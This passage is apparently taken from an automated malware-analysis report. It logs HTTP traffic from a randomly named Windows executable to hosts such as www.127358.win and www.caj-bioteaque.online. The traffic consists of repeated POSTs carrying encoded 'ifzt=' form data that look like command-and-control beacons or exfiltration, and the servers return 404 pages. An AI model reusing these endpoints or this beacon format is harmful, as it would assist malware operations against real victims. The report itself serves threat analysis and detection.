                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                                                Nov 25, 2024 09:43:11.526052952 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                9192.168.2.449792206.238.89.119803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:17.534715891 CET774OUTPOST /jr18/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.127358.win
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.127358.win
                                                                                                                                                Referer: http://www.127358.win/jr18/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 36 41 51 7a 66 4e 74 6b 4a 70 4b 51 36 59 77 70 58 73 76 68 64 78 52 4c 52 37 38 66 56 69 49 74 4e 37 70 2f 68 44 67 47 58 4c 32 4d 4d 59 2f 52 54 62 44 58 34 65 5a 66 70 77 6c 69 75 43 6d 5a 31 43 55 45 79 65 66 49 53 32 36 36 70 6f 6f 65 2f 6a 42 46 34 4f 5a 32 6a 45 33 49 71 2b 4f 77 6d 59 77 34 59 58 33 6b 53 5a 6b 6e 79 79 58 33 45 57 5a 44 69 45 71 79 4f 53 58 64 39 59 33 74 4f 2b 4a 67 4b 63 53 44 38 72 36 77 4d 64 59 6a 2b 51 59 4f 35 70 41 50 4a 2f 74 6e 73 47 72 49 6a 49 47 4f 65 71 50 61 68 73 7a 2b 6c 51 34 56 6b 41 52 54 76 79 52 57 31 77 6b 6a 55 6f 69 62 74 67 3d 3d
                                                                                                                                                Data Ascii: ifzt=6AQzfNtkJpKQ6YwpXsvhdxRLR78fViItN7p/hDgGXL2MMY/RTbDX4eZfpwliuCmZ1CUEyefIS266pooe/jBF4OZ2jE3Iq+OwmYw4YX3kSZknyyX3EWZDiEqyOSXd9Y3tO+JgKcSD8r6wMdYj+QYO5pAPJ/tnsGrIjIGOeqPahsz+lQ4VkARTvyRW1wkjUoibtg==
                                                                                                                                                Nov 25, 2024 09:43:19.078130007 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:18 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                10192.168.2.449798206.238.89.119803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:20.283946037 CET794OUTPOST /jr18/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.127358.win
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.127358.win
                                                                                                                                                Referer: http://www.127358.win/jr18/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 36 41 51 7a 66 4e 74 6b 4a 70 4b 51 31 63 4d 70 56 4c 7a 68 66 52 52 4b 61 62 38 66 63 43 4a 6b 4e 37 6c 2f 68 43 56 65 57 2b 6d 4d 50 39 37 52 53 65 6a 58 35 65 5a 66 78 41 6c 72 71 43 6d 65 31 43 59 6d 79 63 62 49 53 32 75 36 70 70 59 65 2b 55 74 47 70 4f 5a 30 32 55 33 4b 33 75 4f 77 6d 59 77 34 59 58 7a 4f 53 66 4d 6e 7a 43 6e 33 43 48 5a 41 73 6b 71 7a 5a 69 58 64 35 59 33 58 4f 2b 49 44 4b 5a 36 35 38 70 79 77 4d 64 6f 6a 2b 43 77 42 73 5a 42 4b 48 66 73 58 6c 6d 43 63 36 74 72 47 66 72 44 4b 35 6f 48 42 70 32 31 50 31 78 77 45 39 79 31 6c 6f 33 74 58 5a 72 66 53 32 73 70 63 74 36 46 38 70 59 66 37 30 45 38 6f 70 7a 76 43 6b 34 73 3d
                                                                                                                                                Data Ascii: ifzt=6AQzfNtkJpKQ1cMpVLzhfRRKab8fcCJkN7l/hCVeW+mMP97RSejX5eZfxAlrqCme1CYmycbIS2u6ppYe+UtGpOZ02U3K3uOwmYw4YXzOSfMnzCn3CHZAskqzZiXd5Y3XO+IDKZ658pywMdoj+CwBsZBKHfsXlmCc6trGfrDK5oHBp21P1xwE9y1lo3tXZrfS2spct6F8pYf70E8opzvCk4s=
                                                                                                                                                Nov 25, 2024 09:43:21.822235107 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:21 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                11192.168.2.449804206.238.89.119803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:23.012981892 CET10876OUTPOST /jr18/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.127358.win
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.127358.win
                                                                                                                                                Referer: http://www.127358.win/jr18/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 36 41 51 7a 66 4e 74 6b 4a 70 4b 51 31 63 4d 70 56 4c 7a 68 66 52 52 4b 61 62 38 66 63 43 4a 6b 4e 37 6c 2f 68 43 56 65 57 2b 75 4d 4d 4c 48 52 51 34 72 58 36 65 5a 66 38 67 6c 75 71 43 6e 43 31 43 41 69 79 63 58 59 53 31 57 36 6f 50 4d 65 72 56 74 47 77 65 5a 30 75 6b 33 4a 71 2b 50 71 6d 59 67 38 59 58 6a 4f 53 66 4d 6e 7a 42 2f 33 55 6d 5a 41 68 45 71 79 4f 53 58 42 39 59 32 34 4f 2b 52 34 4b 5a 32 70 39 5a 53 77 4e 39 34 6a 79 52 59 42 77 4a 42 45 41 66 73 50 6c 6d 65 71 36 70 4c 67 66 71 48 67 35 76 76 42 2f 54 6f 75 71 43 41 72 6a 42 31 45 77 6e 6c 33 43 62 4c 78 31 38 56 6d 6b 61 35 47 2b 4c 44 4a 78 54 59 73 30 41 50 55 6d 73 70 70 4e 4b 54 67 48 34 56 31 7a 6f 50 2f 78 30 58 5a 6a 51 31 2f 65 46 6c 47 63 58 6a 39 4b 67 36 79 48 35 4d 38 6f 46 42 4b 63 2b 50 35 36 68 66 61 61 31 6c 59 39 37 47 4d 48 32 4f 65 71 39 38 59 61 6e 51 7a 50 79 33 56 34 44 36 41 4f 78 4a 61 52 37 47 67 61 68 61 32 69 79 5a 56 6a 4a 34 58 6e 74 44 65 39 5a 75 6c 7a 6a 72 45 41 75 6f 52 35 42 66 36 61 [TRUNCATED]
                                                                                                                                                Data Ascii: ifzt=6AQzfNtkJpKQ1cMpVLzhfRRKab8fcCJkN7l/hCVeW+uMMLHRQ4rX6eZf8gluqCnC1CAiycXYS1W6oPMerVtGweZ0uk3Jq+PqmYg8YXjOSfMnzB/3UmZAhEqyOSXB9Y24O+R4KZ2p9ZSwN94jyRYBwJBEAfsPlmeq6pLgfqHg5vvB/TouqCArjB1Ewnl3CbLx18Vmka5G+LDJxTYs0APUmsppNKTgH4V1zoP/x0XZjQ1/eFlGcXj9Kg6yH5M8oFBKc+P56hfaa1lY97GMH2Oeq98YanQzPy3V4D6AOxJaR7Ggaha2iyZVjJ4XntDe9ZulzjrEAuoR5Bf6aoG9/Ot5/wyDHq3UYzLoWhi1pnlAUyFB8WoDPWHanJ2vFwKkNiJdDUUa+lHTkTbNnMihDQemnMZVaViM/kPwCYFkBUuVNL+VeWhsARg294EyRLfsfmGpoNvI91kAX4+L823XZYgej9z4M9/6vUgdIGVGRrBucF709lzvS5+fmE6DD7Xbgkb42ST0V95P/QNIxv85jMzUqFTaWrIeO79pccTpo7BonuyCpKsg6NZe0uvC8ZAKv11idxTMgQKLTcJybcIlLocDOCMkYSkT5XnMTQwNfaO7ci3QNRkEdGKXmx2zC64vFteJ82euCBICEKWBiuM+5LGrdNJy4u7Me99F2xiGmCMjRWWIqgDEpDhRexLaiCVnb+Nq7YjytEOErBLUxzUMiOkfefdxxO4RuVnK7QEMjMJh63wo0BrynKhESIpXePTonKZfXX/9Vcu6OFKi/WcM4cx31630BOMQYgZMhk29gW3ALCrJWoC4jEwF3gxfqn6VM+aH6BCMx9ZydxsFxDWw1eGp0yTzsV36pf0/Zl3mYA8xE09N1r6P7Z9xb2eiVFx7weJEp+awNUl+w7r8G68ipEkbCl/hIVEh5Yeh0cQIoVqvg8jJYbxYP0xOqYlz1iGI3F7JrZRlnse0oP1CGz8CBghwSnBOgjNNod9p7fUWSz3W+gn0OA7 [TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:43:24.539942026 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:24 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                12192.168.2.449810206.238.89.119803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:25.871084929 CET514OUTGET /jr18/?ifzt=3C4Tc4Z0RY2s+tVmXeTOODIbYY0cZjMPNpxOrzRAWYWXOarDQI6T49to0R5yr2OUxBUw9rD3bXyFurU9wVp+2dZYmhq26qK0uIAUBFaEfelf6gXLCXJ0iXw=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.127358.win
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:43:27.326922894 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:27 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: close
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                13192.168.2.449830212.123.41.108803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:33.514730930 CET804OUTPOST /i3tv/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.caj-bioteaque.online
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.caj-bioteaque.online
                                                                                                                                                Referer: http://www.caj-bioteaque.online/i3tv/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Raw: 69 66 7a 74 3d 55 64 74 47 73 56 70 46 49 53 2b 7a 49 4e 4e 49 75 6f 59 41 35 42 2b 33 64 34 44 4d 70 48 62 79 4a 58 4a 73 6a 38 6a 52 38 38 53 68 45 30 6e 61 7a 6f 66 2f 43 75 59 33 33 64 4f 73 61 74 53 42 56 4a 74 62 2f 37 6d 59 6d 70 75 51 59 43 41 39 53 59 34 75 32 58 6c 39 4d 48 35 6d 30 45 33 5a 44 36 59 31 48 55 4c 58 49 59 61 56 41 32 64 77 66 71 6b 70 4e 49 53 50 44 44 32 6b 38 72 67 73 56 39 4c 6e 70 7a 68 6b 62 33 4b 49 53 6a 6d 78 54 36 4f 6a 5a 34 61 72 78 74 70 4c 61 6a 74 7a 2b 31 58 55 58 51 32 77 35 71 69 36 6e 4d 69 73 6a 70 4e 71 5a 79 72 6a 2b 6d 4b 66 46 68 4b 6f 66 77 3d 3d
                                                                                                                                                Data Ascii: ifzt=UdtGsVpFIS+zINNIuoYA5B+3d4DMpHbyJXJsj8jR88ShE0nazof/CuY33dOsatSBVJtb/7mYmpuQYCA9SY4u2Xl9MH5m0E3ZD6Y1HULXIYaVA2dwfqkpNISPDD2k8rgsV9Lnpzhkb3KISjmxT6OjZ4arxtpLajtz+1XUXQ2w5qi6nMisjpNqZyrj+mKfFhKofw==
                                                                                                                                                Nov 25, 2024 09:43:34.856048107 CET670INHTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Mon, 25 Nov 2024 08:40:36 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"5d07e7ed-36b"
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                Data Raw: 31 63 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b5 53 cd 8e d3 40 0c be e7 29 cc 9e b7 1d 10 e2 52 86 48 ab c2 a1 07 16 84 2a 24 8e 6e c6 69 46 4a c6 c1 e3 6c 54 21 de 1d 4f d2 65 81 0b 5c c8 25 33 8e ed ef c7 8e 7f f6 f6 c3 fe f8 e5 e3 3b e8 74 e8 eb ca 3f be 08 83 dd 34 6a 4f f5 67 92 d8 c6 06 35 72 02 6e 61 cf 49 b1 51 38 a4 96 65 58 c2 de ad a9 95 cf 7a b1 92 0a ec 39 71 b8 c0 b7 e5 58 ae 73 0c da ed e0 e5 2b 1a 5e ff 0c 0e 28 e7 98 76 f0 1c 70 52 7e 8a b7 86 b1 69 71 88 fd 65 07 47 ec 78 c0 5b 30 22 01 93 1d ee 24 62 7f 0b 19 53 de e4 c2 6e 2d fc 5e 79 77 c5 f7 ae 5b 25 14 12 45 d7 8b 7f 93 61 79 95 1f eb 63 47 10 0c 33 26 88 19 94 86 91 05 c5 c8 80 59 d0 71 1f 60 a4 14 62 3a c3 c3 1f e6 a8 55 92 15 f6 80 21 08 e5 5c 1c 2b c1 4f 74 8e 59 05 93 02 66 2b 97 25 7a d8 df dd df 83 4c 3d 59 62 2a 0a ff 66 f5 d6 bb b1 ae 0a c9 f7 2c c6 92 d4 c0 1e 51 32 5d 7b 35 98 e0 44 d0 f2 94 02 a0 ee fc 49 9c 29 43 e8 84 da 37 37 9d ea b8 73 6e 9e e7 ad 0d 36 a5 2d cb d9 51 72 46 98 27 69 28 bb 86 87 b1 8f 98 1a 5a [TRUNCATED]
                                                                                                                                                Data Ascii: 1c5S@)RH*$niFJlT!Oe\%3;t?4jOg5rnaIQ8eXz9qXs+^(vpR~iqeGx[0"$bSn-^yw[%EaycG3&Yq`b:U!\+OtYf+%zL=Yb*f,Q2]{5DI)C77sn6-QrF'i(ZfflWn;Zh<'ssuW%_`~rL:QV{&Xylju@yJ`sA`+Q1@k0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                14192.168.2.449836212.123.41.108803164C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 25, 2024 09:43:36.188087940 CET824OUTPOST /i3tv/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
